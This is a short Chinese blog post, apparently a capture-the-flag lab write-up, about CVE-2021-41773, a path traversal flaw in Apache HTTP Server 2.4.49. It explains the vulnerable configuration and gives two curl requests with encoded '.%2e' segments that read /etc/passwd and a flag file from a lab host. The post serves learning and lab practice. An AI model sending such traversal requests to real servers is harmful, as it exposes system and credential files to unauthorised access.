前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >CVE-2021-41773

CVE-2021-41773

作者头像
cultureSun
发布2023-08-26 16:33:36
3980
发布2023-08-26 16:33:36
举报
文章被收录于专栏:cultureSun学安全cultureSun学安全

简介

靶场搭建:春秋云境免费靶场

CVE-2021-41773: Apache HTTPd 2.4.49 路径穿越与命令执行漏洞。 2021年10月5日,Apache发布更新公告,修复了Apache HTTP Server 2.4.49中的一个路径遍历和文件泄露漏洞(CVE-2021-41773)。 攻击者可以通过路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“require all denied” 访问控制参数的保护,则这些恶意请求就会成功。除此之外,该漏洞还可能会导致泄漏 CGI 脚本等解释文件的来源。

详解

路径穿越

是一种常见的漏洞攻击类型,也被称为目录遍历攻击或目录穿越攻击。路径穿越攻击利用了Web应用程序对用户输入的不充分验证和过滤,使得攻击者可以访问文件系统中的敏感文件或目录。攻击者通过构造恶意的输入,试图访问应用程序外部的文件或目录,甚至可能获取到包含敏感信息的配置文件、密码文件等。

漏洞条件

如上文所述,如果配置文件配置如下参数,则可以访问web根目录以外的目录和文件。

代码语言:javascript
复制
<Directory />Require all granted</Directory>

且同时配置CGI。 在Apache Web服务器中,cgi-bin 是一个常用的目录,用于存放 CGI(Common Gateway Interface)脚本文件。CGI是一种标准化的协议,允许Web服务器与外部程序进行通信,以生成动态的网页内容。 当用户请求一个位于 cgi-bin 目录下的文件时,Apache会将请求传递给相应的CGI脚本,并将其执行。

漏洞利用1

因为代码漏洞,在未url解码就过滤请求路径中的../,所以可以利用对.url编码进行绕过。

利用curl请求:

代码语言:javascript
复制
curl http://39.106.48.123:43714/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

flag

利用curl请求:

代码语言:javascript
复制
curl http://39.106.48.123:43714/cgi-bin/.%2e/.%2e/.%2e/.%2e/flag
本文参与 腾讯云自媒体分享计划,分享自作者个人站点/博客。
原始发表:2023-08-24,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 简介
  • 详解
    • 路径穿越
      • 漏洞条件
        • 漏洞利用1
          • flag
          领券
          问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档